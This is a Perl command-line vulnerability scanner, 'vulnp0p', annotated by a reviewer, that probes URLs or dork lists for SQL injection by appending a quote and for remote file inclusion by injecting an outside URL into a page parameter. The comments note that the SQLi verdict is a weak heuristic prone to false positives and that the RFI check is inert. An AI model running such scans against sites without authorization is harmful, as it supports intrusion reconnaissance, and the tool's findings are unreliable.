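#!/usr/bin/perl
# vulnp0p - command-line URL checker.
#
# Takes either a single URL (-u) or a file of URLs (-m) and, per URL, runs
# the checks selected with -S (SQLi) and/or -R (RFI). -g is a placeholder
# that only prints "under construction".
#
# What the -S probe looks like from the server side (useful for detection):
#   * an empty-bodied POST to the supplied URL with a single quote appended;
#   * sent by LWP::UserAgent with default settings, so the User-Agent header
#     is the library default ("libwww-perl/<version>").
#
# NOTE(review): the window title says v1.6 while the banner says v2.1; both
# strings are kept as found.
use strict;
use warnings;
use LWP::UserAgent;
use Getopt::Std;
use IO::Socket;

# Print the usage text. The wording is unchanged from the original.
sub help {
    print "\n\n";
    print <<'END_HELP';
usage: ./vulnp0p [OPTIONS] [VULNERABILITY]

OPTIONS:

-u - scan single url
-m - scan url list in file
-g - scan with google
-h - displays help menu

VULNERABILITIES:

-S - runs SQLi scan
-R - runs RFI scan
-------------------------------------------------------


ex. ./vulnp0p -u http://www.example.org/index.php?page=35 -S
    ./vulnp0p -u http://www.example.org/index.php?page=main -R
    ./vulnp0p -u http://www.example.org/index.php?page=home.php -S -S
    ./vulnp0p -m url.txt -S -S
    ./vulnp0p -g -S -S


-------------------------------------------------------
END_HELP
    return;
}

# Run the -S check against one URL and print the verdict.
#
#   $ua  - LWP::UserAgent instance used for the request
#   $url - URL exactly as supplied by the user / list file
#
# NOTE(review): the verdict is a weak heuristic. Any non-2xx status (404,
# 403 from a WAF, 500 for unrelated reasons) or any non-HTML content type
# (JSON, plain text, images) is reported as "vulnerable". Treat a "[+]" line
# as "response changed, verify by hand", not as a confirmed finding.
sub check_sqli {
    my ($ua, $url) = @_;

    my $sqliurl = "$url'";
    print "[*] testing if $url is vulnerable to sqli...\n";
    print "[*] trying $sqliurl \n";
    my $test = $ua->post($sqliurl);

    # The original printed "[-] not vulnerable" unconditionally, even right
    # after a "[+]" line; only print it when nothing was flagged.
    my $flagged = 0;
    if (!$test->is_success) {
        print "[+] $url is vulnerable to SQLi error: \n", $test->status_line, "\n";
        $flagged = 1;
    }
    if (!$test->content_is_html) {
        print "[+] $url is vulnerable to SQLi\n", $test->content_type, "\n";
        $flagged = 1;
    }
    print "[-] $url is not vulnerable to sqli\n" unless $flagged;
    return;
}

# Run the -R check against one URL and print the verdict.
#
#   $ua  - LWP::UserAgent instance used for the request
#   $url - URL exactly as supplied by the user / list file
#
# NOTE(review): this check is inert as written. The pattern is anchored at
# both ends, so it can only match a bare "index.php"-like string and never a
# full URL; every real URL takes the else branch. The statements inside the
# if are kept as found (the strings are single-quoted literals, and the log
# handle is append-only so nothing is read back). Its output carries no
# signal either way.
sub check_rfi {
    my ($ua, $url) = @_;

    print "[*] testing if $url is vulnerable to RFI...\n";
    if ($url =~ m/^index.php?$/) {
        my @page   = split('=', $url);
        my $rfiurl = '$page[0]=http://www.google.co.uk';
        print "[*] trying $rfiurl \n";
        my $get = $ua->get('$RFIurl');

        # Three-argument open with a lexical handle, and a checked result:
        # the original used a bareword handle and ignored failures.
        my $log;
        if (!open $log, '>>', 'RFItest.txt') {
            warn "cannot append to RFItest.txt: $!\n";
            return;
        }
        print {$log} $get;
        close $log or warn "cannot close RFItest.txt: $!\n";

        # The original tried to read from the append-only handle, which
        # always yields undef; keep that outcome without the warning.
        my $search;
        if (defined $search && $search =~ m/^google$/) {
            print "[+] $url is vulnerable to RFI\n";
        }
    }
    else {
        print "[-] $url is not vulnerable to RFI or $url is not formed well\n";
    }
    return;
}

# ---------------------------------------------------------------------------
# Startup: show host OS details and the banner.
# ---------------------------------------------------------------------------
my $osid;    # set per platform below; not read anywhere in the visible script
my $os = $^O;

if ($os =~ m/linux/) {
    $osid = 1;

    # system() returns an exit status, not the command's output, so the
    # original always printed "0" here. Read the values directly instead of
    # shelling out.
    my $kernel = 'unknown';
    if (open my $rel, '<', '/proc/sys/kernel/osrelease') {
        my $line = <$rel>;
        close $rel;
        if (defined $line) {
            chomp $line;
            $kernel = $line;
        }
    }
    require POSIX;
    my $osinfo = join ' ', POSIX::uname();

    system('clear');
    print "OS info: \n";
    print "\n";
    # The original passed a garbled terminal-title escape to the shell;
    # emit the xterm title sequence directly, and only to a terminal.
    print "\e]2;vulnp0p v1.6 by perlp0pper\a" if -t STDOUT;
    print "$os $kernel info: $osinfo\n";
}

if ($os =~ m/MSWin32/) {
    $osid = 2;
    system('cls');
    print "OS info: \n";
    print "\n";
    system('title vulnp0p v1.6 by perlp0pper');

    # The original used "last" outside any loop when Win32 failed to load,
    # which is a fatal error; fall back to the bare OS name instead.
    if (eval { require Win32; 1 }) {
        my $osname = Win32::GetOSName();
        my ($osver, $major, $minor, $id) = Win32::GetOSVersion();
        print "$os $osname $osver.$major.$minor $id\n";
    }
    else {
        print "$os\n";
    }
}

print q{
########################################
# vulnp0p v2.1 by perlp0pper           #
# ------------------------------------ #
# Anonymous group - join us at the irc #
# ./vulnp0p -h for help                #
########################################
};

# ---------------------------------------------------------------------------
# Option handling.
# ---------------------------------------------------------------------------
my %args;
if (!getopts("hu:SRm:g", \%args)) {
    # Unknown switch or missing argument: show usage instead of carrying on.
    help();
    exit 1;
}

if (defined $args{h}) {
    help();
    exit;
}

# -g counts as a mode too; the original omitted it here, so "-g" alone
# printed the help text and never reached the branch below.
if (!defined $args{u} && !defined $args{m} && !defined $args{g}) {
    help();
    exit;
}

if (defined $args{g}) {
    print "under construction\n";
    exit;
}

# ---------------------------------------------------------------------------
# -m FILE: run the selected checks for every URL listed in FILE.
# ---------------------------------------------------------------------------
if (defined $args{m}) {
    my $ua   = LWP::UserAgent->new;
    my $file = $args{m};

    # Three-argument open: the file name comes from the command line and must
    # not be able to influence the open mode. Fail loudly if it is unreadable.
    open my $list, '<', $file or die "cannot open URL list '$file': $!\n";
    my @urls = <$list>;
    close $list;

    foreach my $dork (@urls) {
        # Strip the line ending; the original left it in, which split every
        # message and request target across two lines.
        chomp $dork;
        next if $dork =~ m/^\s*$/;

        print "###################################################################\n";
        print "# $dork #\n";
        print "###################################################################\n";

        check_sqli($ua, $dork) if defined $args{S};
        check_rfi($ua, $dork)  if defined $args{R};
    }
}

# ---------------------------------------------------------------------------
# -u URL: run the selected checks for a single URL.
# ---------------------------------------------------------------------------
if (defined $args{u}) {
    my $url = $args{u};
    my $ua  = LWP::UserAgent->new;

    check_sqli($ua, $url) if defined $args{S};
    check_rfi($ua, $url)  if defined $args{R};
}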